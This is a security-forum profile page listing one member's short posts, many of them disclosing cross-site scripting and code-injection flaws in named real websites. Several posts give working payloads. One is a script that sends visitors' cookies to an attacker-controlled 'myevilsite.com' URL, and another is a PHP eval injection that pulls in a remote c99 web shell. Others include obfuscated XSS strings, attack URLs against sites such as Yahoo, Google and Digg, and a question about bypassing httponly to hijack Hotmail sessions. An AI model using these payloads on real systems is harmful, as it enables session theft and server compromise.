Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 35
7 years ago
beford
http://www.mozilla.org/security/announce/2007/mfsa2007-02.html http://ha.ckers.org/xss.html#XSS_Non_alpha_non_digit2 You probably want to filter out document.location, top.location, self.location
Forum: Projects
7 years ago
beford
hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22window.location='ht'%2b'tp://google.com/?'%2bdocument.cookie Affects Firefox 2.x < 2.0.0.2 Firefox 1.5x < 1.5.10 :P
Forum: Projects
7 years ago
beford
http://phpids.heideri.ch/?test=\..\..\..\thisfile
Forum: Projects
6 years ago
beford
If you try something like: http://comicfury.com/search.php?s=%3Cscript%3E It'll return a 503 Apache error, I guess that'll protect against most of the obvious attacks. However: http://comicfury.com/forum/viewforum.php/%27%22%3E%3Cimg%20src=1%20onerror=alert(/xss/)%3E?id=3 PHP_SELF XSS
Forum: XSS Info
6 years ago
beford
I'm using a ZyXEL P-660HW Series http://www.zyxel.com/web/product_family_detail.php?PC1indexflag=20040812093058&CategoryGroupNo=AC5783AE-9475-41AD-BDA5-0997187F44AA . There are a lot of CSRF stuff on this router, it can be used to change DNS servers, add keywords to bannedlist on URL, it's also affected by the IP-based session management attacks mentioned on gnucitizen, and to authenticate yo
Forum: News and Links
7 years ago
beford
http://www.real.com/dmm/superpass/haokan/english?pageid=broadBandHomePage_3&pageregion=bottom_region&src=realhome_bb_3_1_1_0_0_1_0%22%3E%3Ch4%3Ex&pcode=rn%22%3E%3C/a%3E%3C/a%3E%3Ca%20href=%22http://blog.beford.org/%22%3Ebeford.org%3C/a%3E%3Cnoscript%3E&opage=realhome_bb
Forum: Full Disclosure
7 years ago
beford
http://www.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3EXSS I've added 2 pocs on my (new :P) blog http://blog.beford.org/?p=3 I'd consider that one of them is kinda scary.
Forum: Full Disclosure
7 years ago
beford
It's cool to see how this evolved from 'not a bug, a feature' :) Congrats Gareth.
Forum: Full Disclosure
7 years ago
beford
z:\ is just a symlink to / so if you open z:\etc\passwd its opening /etc/passwd, you need to check the address bar on the screenshot, not the window title. I'm opening 'z:\home\beford\Desktop\foobar%2F..%2F..%2F..%2Fetc%2Fpasswd' not 'z:\etc\passwd'.
Forum: Full Disclosure
7 years ago
beford
Ronald Wrote: ------------------------------------------------------- > Ahm... in case I don't get it: this is pretty > normal in Linux your just browse the file like any > other, and there isn't a \etc\ dir on Windows so > that would never work on a Windows machine. > > Or am I missing the point? The point is that it should not display my /etc/passwd, It should instea
Forum: Full Disclosure
7 years ago
beford
So I was bored the other day without internet access started messing around Gnome VFS and noticed that some apps (like fspot) where urldecoding the names of the files that you 'drag&drop'ed to them. This is what I got after a while. http://beford.org/wineie.jpg I think that its more like a wine issue because I couldn't reproduce the problem on Windows, however not all Windows Apps on Win
Forum: Full Disclosure
7 years ago
beford
The screenshot is small but its kind obvious that the bug is somehow related to the iphone interface recently released www.digg.com/iphone
Forum: XSS Info
7 years ago
beford
It seems like you can't use quotes, and the url link gets 'htmlized', so try something like: <body onload=eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,32,102,116,119,33,34,41))>
Forum: XSS Info
7 years ago
beford
http://www.sanity.com.au/search/advanced.asp?failed=Y&v=&price_less_than=500&availability=All&released_from=1980&released_to=2007&artist=%22%3E%3Ch4%3Exss1&title=%22%3E%3Ch4%3Exss2&song=%22%3E%3Ch4%3Exss3&department=All&format=All&sort=
Forum: XSS Info
7 years ago
beford
Nice paper, however you didnt include DUH (DUMP URL HANDLERS) on the appendix section (as the paper claimed).
Forum: Full Disclosure
7 years ago
beford
christ1an Wrote: ------------------------------------------------------- > I apologize for my offense beford. I never > intended to make such a big deal about this. The > fact is, I contacted them a couple of times > without receiving an answer. At the same time, the > number of vulnerabilities rose each week or so. So > I had to force them to contact me. The only way to
Forum: Full Disclosure
7 years ago
beford
christ1an Wrote: ------------------------------------------------------- > Beford if you really think so, please go back off > in your corner. Obviously you did not understand a > thing about all this. I dont understand why you need to make it a big deal, you claim that they didn't answers your mails, did you contact them to their official address security@google.com? Last vulnerab
Forum: Full Disclosure
7 years ago
beford
I'm a bit late to this thread, however I'm not sure if I'm the only one that thinks this about the post:
Forum: Full Disclosure
7 years ago
beford
<script> xi=new Image(); xi.src="http://www.myevilsite.com/cookiestealer.php?"+document.cookie; </script>
Forum: XSS Info
7 years ago
beford
heh yea, I read about that on digg.com at first I thought that the attacker had hijacked the domain name, because that was the title of the post. You can see here the mirror of the deface http://duggmirror.com/security/Netscape_Hacked_By_Digg/ if you disable scripting for duggmirror, and view source, you can check where the script injection was done.
Forum: News and Links
7 years ago
beford
AFAIK Mozilla Corp/Org get money from Google. http://www.internetnews.com/dev-news/article.php/3590756
Forum: Search Engine Hacking and SEO
7 years ago
beford
I've just noticed this, when you use Opera internal Source code viewer, it fails to display the whole html code if the page contains a NULL (0x00) char. Its not a big deal, but it can be abussed to hide evil javascript code for Opera users. I've just tested this in Opera for Windows. http://beford.org/xss/opera.php I was looking previous references for this issue, only this came on a quick
Forum: XSS Info
7 years ago
beford
?query=";eval($_GET);//&a=include('http://no.spam.ee/~tonu/phpshell/c99shell.txt'); You can replace the txt file with your own php code, it requires allow_url_fopen to be enabled though.
Forum: SQL and Code Injection
7 years ago
beford
";eval($a);// needs register_globals on though It's easier if you check the php source code, and find another variable, that gets assigned from $_GET/$_POST/$_COOKIE/$_REQUEST/$_SERVER['HTTP_XX'] then you can use it with the eval function, and it'll work regardless register_globals configuration
Forum: SQL and Code Injection
7 years ago
beford
just wondering, does this XSS affect logged users?
Forum: XSS Info
7 years ago
beford
http://www.youtube.com/watch?v=8zEQhhaJsU4
Forum: OMG Ponies
7 years ago
beford
http://groups.yahoo.com/convacct?email=owned%40gmail.com&list=tux%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Forum: Full Disclosure
7 years ago
beford
I don't have an account to test it, but, did you try it with opera? Opera users might be vulnerable to this.
Forum: XSS Info
7 years ago
beford
> Not sure what you were trying to do, but this > works in IE, FF and Opera: > > http://apidoc.digg.com/FindPage?SearchFor=Digg%22% > 3e%3cscript%3ealert(1)%3c/script%3e%3cinput > > Added a dead input tag to hide the maxlength > attribute on the search box that gets orphaned on > the injection. Looks like apidoc.digg.com is using a WikiLike software from www
Forum: Full Disclosure
7 years ago
beford
I've just noticed that Microsoft enabled httponlycookies for MSPAuth and MSPProf hotmail cookies, which is, erm, good. Oh well, I guess that we won't be able to XSS hotmail IE users. Firefox and Opera users are still vulnerables though. Anybody else noticed this? How could I bypass this httponly restriction? :P
Forum: XSS Info
Pages: 12Next
Current Page: 1 of 2